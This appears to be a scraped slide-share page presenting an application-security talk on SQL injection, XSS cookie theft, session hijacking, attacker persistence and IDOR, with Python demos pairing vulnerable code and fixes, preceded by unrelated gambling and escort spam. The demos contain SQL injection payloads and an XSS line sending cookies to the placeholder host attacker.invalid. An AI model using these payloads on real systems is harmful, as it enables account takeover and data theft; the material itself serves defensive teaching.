KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
 
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINEDJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
 
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
Application security

• 6. Application Vulnerability
A software vulnerability is a flaw that makes the application process critical data in an insecure way. By exploiting these "holes" in applications, cybercriminals can gain entry into an organization's systems and steal confidential data.
Common software vulnerabilities:
• SQL injection
• Cross-Site Scripting (XSS)
Almost every application has vulnerabilities: about 70% of all applications had at least one vulnerability classified as one of the top 10 web vulnerability types. Commercial software, financial services software, software written by government agencies … all are vulnerable.
• 7. Application Vulnerability - Demo Attack
Phases of a hacker attack:
1. Information: fingerprinting, vulnerability databases, bulletin boards, …
2. Infrastructure: phishing, pharming, XSS, …
3. Exploit: …
4. Keep Access: backdoor, trojan, rootkits, …
5. Delete Fingerprints: destroy evidence, steganography, tunneling
• 8. Application Vulnerability - Demo Attack: Phase 1 (Information) - SQL Injection
1. The attacker gathers information about the victim's target system: operating system, web server, database.
2. Compares that information against a vulnerability database.
3. Finds a vulnerability and uses it to search for a specific user and to pull additional information about that user.
4. That information is what the next phase of the attack needs.
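The lookup described in steps 3 and 4 is usually a query that splices the search term straight into SQL. The following is an added example, not code from the slides: a constructed in-memory user table, the vulnerable lookup next to a parameterised one, and two payloads, one that dumps every user and one that reads the schema out of sqlite_master, which is the "find additional information" step. The table, names and payload strings are all assumptions made for the demo.

```python
import sqlite3

# Constructed sample data standing in for the victim's user table (not from the slides).
SAMPLE_USERS = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "victim", "victim@example.com"),
]


def make_db():
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, name):
    """Vulnerable lookup: the untrusted value is spliced into the SQL text."""
    sql = "SELECT id, name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Hardened lookup: the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT id, name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Two classic payloads. DUMP_ALL turns the WHERE clause into a tautology and returns
# every user. READ_SCHEMA uses UNION to read table definitions from sqlite_master and
# comments out the closing quote, which is how an attacker learns the schema.
DUMP_ALL = "x' OR '1'='1"
READ_SCHEMA = "x' UNION SELECT 1, name, sql FROM sqlite_master--"


def demo():
    """Run the same lookups through both implementations and return the rows each gives."""
    conn = make_db()
    return {
        "normal": find_user_vulnerable(conn, "victim"),
        "dump_all_vulnerable": find_user_vulnerable(conn, DUMP_ALL),
        "read_schema_vulnerable": find_user_vulnerable(conn, READ_SCHEMA),
        "dump_all_safe": find_user_safe(conn, DUMP_ALL),
        "read_schema_safe": find_user_safe(conn, READ_SCHEMA),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

With the parameterised version both payloads are just strings compared against the name column, so they match nothing; the vulnerable version hands back all three users for the first payload and the CREATE TABLE statement for the second.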
• 9. Application Vulnerability - Demo Attack: Phase 2 (Infrastructure) - Cross-Site Scripting (XSS)
1. The attacker has found personal information about the user: e-mail address, phone number, …
2. Sends an e-mail with an unsuspicious topic.
3. Includes in the e-mail an XSS payload that sends the user's session to the attacker's server.
4. The user receives the e-mail.
5. The e-mail looks harmless to the user (topic and originator).
6. The included XSS sends all cookies to the attacker's web site.
• 10. Application Vulnerability - Demo Attack: Phase 3 (Exploit) - Session Hijacking
1. The attacker has received all of the user's cookies.
2. Cookies are what the application uses to identify the user.
3. The attacker replays the session cookie to resume the user's session.
4. The attacker is now logged in as user "victim" with the victim's access rights.
XSS-Proxy is a tool for leveraging Cross-Site Scripting (XSS) flaws to hijack victim browsers; it provides a bi-directional interactive control channel between the attacker, the victim's browser and the XSS-vulnerable site.
Now the attacker is logged in to your banking site with your access rights. That was just the beginning.
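Phases 2 and 3 together are one chain: a reflected payload reads the session cookie and the cookie is replayed. The block below is an added example, not from the slides, showing the two server-side controls that break that chain: output encoding of untrusted content (so the payload is rendered as text) and a check that the session cookie carries HttpOnly, Secure and SameSite. The page fragment, the payload and the host attacker.invalid are constructed for the demo.

```python
import html

# Constructed attacker payload modelled on step 3 of the slide: a broken image whose
# error handler ships document.cookie to a collection host. attacker.invalid is a
# placeholder, not a real host.
COOKIE_THEFT_PAYLOAD = (
    '<img src="x" onerror="(new Image()).src='
    "'http://attacker.invalid/c?'+encodeURIComponent(document.cookie)\">"
)


def render_comment_vulnerable(comment):
    """Reflect the untrusted comment straight into the page body."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment):
    """Escape <, >, &, \" and ' so the browser shows the payload as plain text."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


def has_live_markup(rendered):
    """Demo check: did an attacker-supplied tag survive unescaped inside the <p>?"""
    body = rendered[len('<p class="comment">'):-len("</p>")]
    return "<" in body


def audit_set_cookie(header_value):
    """Return the protections missing from a Set-Cookie header value.

    HttpOnly keeps page script (including injected script) from reading the cookie,
    Secure keeps it off plaintext HTTP, and SameSite=Lax/Strict keeps it off
    cross-site requests.
    """
    parts = [p.strip() for p in header_value.split(";")]
    attrs = {}
    for part in parts[1:]:  # parts[0] is name=value
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    if "secure" not in attrs:
        missing.append("Secure")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        missing.append("SameSite=Lax or Strict")
    return missing


if __name__ == "__main__":
    print(render_comment_vulnerable(COOKIE_THEFT_PAYLOAD))
    print(render_comment_safe(COOKIE_THEFT_PAYLOAD))
    print(audit_set_cookie("sessionid=7f3a9c; Path=/"))
    print(audit_set_cookie("sessionid=7f3a9c; Path=/; HttpOnly; Secure; SameSite=Lax"))
```

HttpOnly only stops the cookie from being read; an XSS payload can still drive requests from inside the victim's browser, which is exactly what XSS-Proxy does, so the encoding fix is the one that matters and the cookie flags are defence in depth.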
• 11. Application Vulnerability - Demo Attack
Phase 4 - Keep Access
• The attacker can install a sniffer to capture all network traffic.
• Uses a backdoor or trojan to gain repeated access.
• May install a rootkit in the kernel to get superuser access at the operating-system level.
• Can then use that access to steal data, consume CPU cycles, exchange confidential information or even resort to extortion.
• Can keep control of the system for a long time by "hardening the system" against other attackers.
Phase 5 - Delete Fingerprints
• Trojaned copies of system binaries such as ps or netstat hide the attacker's processes and connections, and log records are edited or wiped to destroy the evidence.
• Steganography is the process of hiding data, for example in images and sound files.
• Tunneling takes advantage of the transmission protocol by carrying one protocol over another. Even the unused bits in TCP and IP headers can be used to hide information.
• 12. Application Security Countermeasures
• Countermeasures are the actions taken to ensure application security.
• An application firewall is the most basic software countermeasure; it limits the execution of files or the handling of data by specific installed programs.
• A router performing NAT is the most common hardware countermeasure; it keeps the IP address of an individual computer from being directly visible on the Internet.
• Other countermeasures include conventional firewalls, encryption/decryption programs, anti-virus programs, spyware detection/removal programs and biometric authentication systems.
• 13. Best Practices to Build Secure Applications
1. Follow the OWASP Top Ten. It lists the most critical web application security vulnerabilities; these target the confidentiality, integrity and availability of an application, its developers and its users. They cover attack vectors such as injection, broken authentication and session management, security misconfiguration and sensitive data exposure.
2. Get an Application Security Audit. Use people with specific, professional application security experience, who know what to look for: the obvious, the subtle and the hidden. They will also be abreast of current security issues and know about issues that are not yet common knowledge.
3. Implement Proper Logging. Sooner or later there will be a bug that nobody saw (or considered severe enough to warrant attention) and that eventually gets exploited. To respond as quickly as possible you need proper logging in place before the situation gets out of hand. Logging tells you what occurred, what led to it in the first place, and what else was going on at the time.
4. Use Real-time Security Monitoring and Protection or Web Application Firewalls. Protect the application from a range of perspectives, internal and external, using firewalls in addition to Runtime Application Self-Protection (RASP) and monitoring services.
• 14. Best Practices to Build Secure Applications (continued)
5. Encrypt Everything. Make sure that data at rest is encrypted as well as data in transit. HTTPS makes Man-in-the-Middle (MITM) attacks on the connection next to impossible, provided the client validates the server certificate.
6. Harden Everything. Ensure that everything is sufficiently hardened, from operating systems to software development frameworks.
7. Keep Your Servers Up to Date. Set servers to install the latest security releases as they become available.
8. Keep Your Software Up to Date. Application frameworks and third-party libraries, just like operating systems, have vulnerabilities. If they are properly supported they are rapidly patched and improved, so always run the latest stable version.
9. Stay Abreast of the Latest Vulnerabilities. Keep up with the attack vectors in play today: cross-site scripting, code injection, SQL injection, insecure direct object references and cross-site request forgery.
10. Never Stop Learning. That way security stays a key consideration and you are far less likely to fall victim to a security or data breach.
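Practices 3 and 4 (proper logging and real-time monitoring) only pay off if the log records carry the fields a detector needs. As an added example, not part of the slides, the block below writes one-line JSON security events and runs a sliding-window detector over them to flag a password-guessing run against one account. The event names, field names, thresholds and the sample log lines are constructed for the demo; the addresses come from the documentation ranges.

```python
import json
from collections import defaultdict, deque
from datetime import datetime, timezone


def log_event(event, ts=None, **fields):
    """Serialise one security event as a single JSON line.

    Record who, from where and what happened; never log the submitted password.
    """
    record = {"ts": ts or datetime.now(timezone.utc).isoformat(), "event": event}
    record.update(fields)
    return json.dumps(record, sort_keys=True)


# Constructed sample log: six rapid failures against "victim" from one address,
# plus ordinary activity from another address. Not real traffic.
SAMPLE_LOG = [
    log_event("auth.login_failed", ts=f"2024-04-10T12:00:{s:02d}+00:00",
              src_ip="203.0.113.7", user="victim", reason="bad_password")
    for s in (0, 5, 10, 15, 20, 25)
] + [
    log_event("auth.login_failed", ts="2024-04-10T12:00:30+00:00",
              src_ip="198.51.100.4", user="alice", reason="bad_password"),
    log_event("auth.login_ok", ts="2024-04-10T12:00:40+00:00",
              src_ip="198.51.100.4", user="alice"),
    log_event("auth.login_failed", ts="2024-04-10T12:05:00+00:00",
              src_ip="198.51.100.4", user="alice", reason="bad_password"),
]


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Alert once per source address that reaches `threshold` failed logins
    inside a sliding window of `window_seconds`. Lines must be in time order."""
    recent = defaultdict(deque)   # src_ip -> timestamps of failures still in the window
    alerted = set()
    alerts = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("event") != "auth.login_failed":
            continue
        ts = datetime.fromisoformat(rec["ts"])
        ip = rec["src_ip"]
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append({"src_ip": ip, "failures": len(window),
                           "last_user": rec["user"], "at": rec["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(json.dumps(alert))
```

The same records answer the incident-response questions the slide lists: the timestamps show what occurred and when, the source address and target user show what led to it, and the surrounding events show what else was going on at the time.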
• 16. Facebook on Spot
Data privacy is a part of information security and cyber security, and any IDOR (missing object-level access control) or data leakage in the GraphQL wrapper implementation and the Facebook APIs is able to destroy an empire like Facebook. Is this related to information security?
During the US elections, a quiz app developed by Kogan for US residents aimed to collect users' data and that of their friends, and it collected data on 50 million users.
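The IDOR the slide names is an authorisation gap: a logged-in caller asks for a record by its id and the server never checks whose record it is. The block below is an added example, not Facebook's code or anything from the slides: a constructed profile store, the vulnerable handler next to one that enforces object-level access control, and a harvester that walks ids the way a data-collecting app would. Names, fields and ids are all made up.

```python
# Constructed profile store keyed by the numeric id that appears in the request,
# e.g. GET /api/profile/2. Names and contact details are made up for the demo.
PROFILES = {
    1: {"owner": "alice", "name": "Alice", "email": "alice@example.com", "phone": "+1-555-0100"},
    2: {"owner": "bob", "name": "Bob", "email": "bob@example.com", "phone": "+1-555-0101"},
}

# What any logged-in user may see about another user.
PUBLIC_FIELDS = ("owner", "name")


class Forbidden(Exception):
    """Raised where an HTTP handler would return 403."""


def get_profile_vulnerable(session_user, profile_id):
    """IDOR: checks that a session exists, then trusts the id from the request."""
    if session_user is None:
        raise Forbidden("login required")
    return PROFILES.get(profile_id)


def get_profile_safe(session_user, profile_id):
    """Object-level authorisation: the record's owner decides what is returned."""
    if session_user is None:
        raise Forbidden("login required")
    profile = PROFILES.get(profile_id)
    if profile is None:
        return None
    if profile["owner"] == session_user:
        return dict(profile)
    # Any other caller gets only the public subset; private fields never leave the server.
    return {field: profile[field] for field in PUBLIC_FIELDS}


def scrape_all(handler, session_user, id_range):
    """Walk ids the way a data-harvesting app would and collect e-mail addresses."""
    emails = []
    for pid in id_range:
        record = handler(session_user, pid)
        if record and "email" in record:
            emails.append(record["email"])
    return emails


if __name__ == "__main__":
    print("vulnerable:", scrape_all(get_profile_vulnerable, "bob", range(1, 4)))
    print("safe:      ", scrape_all(get_profile_safe, "bob", range(1, 4)))
```

The check belongs in the handler for every object type, not in one place that is easy to forget; a single endpoint that skips it is enough for a harvester to enumerate the whole id space.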
• 17. What will Facebook's information security team do?
• Review our platform. We will investigate all apps that had access to large amounts of information before we changed our platform in 2014 to reduce data access, and we will conduct a full audit of any app with suspicious activity. If we find developers that misused personally identifiable information, we will ban them from our platform.
• Tell people about data misuse. We will tell people affected by apps that have misused their data. This includes building a way for people to know if their data might have been accessed via "thisisyourdigitallife." Moving forward, if we remove an app for misusing data, we will tell everyone who used it.
• Turn off access for unused apps. If someone hasn't used an app within the last three months, we will turn off the app's access to their information.
• Restrict Facebook Login data. We are changing Login, so that in the next version, we will reduce the data that an app can request without app review to include only name, profile photo and email address. Requesting any other data will require our approval.
• Encourage people to manage the apps they use. We already show people what apps their accounts are connected to and control what data they've permitted those apps to use. Going forward, we're going to make these choices more prominent and easier to manage.
• Reward people who find vulnerabilities. In the coming weeks we will expand Facebook's bug bounty program so that people can also report to us if they find misuses of data by app developers.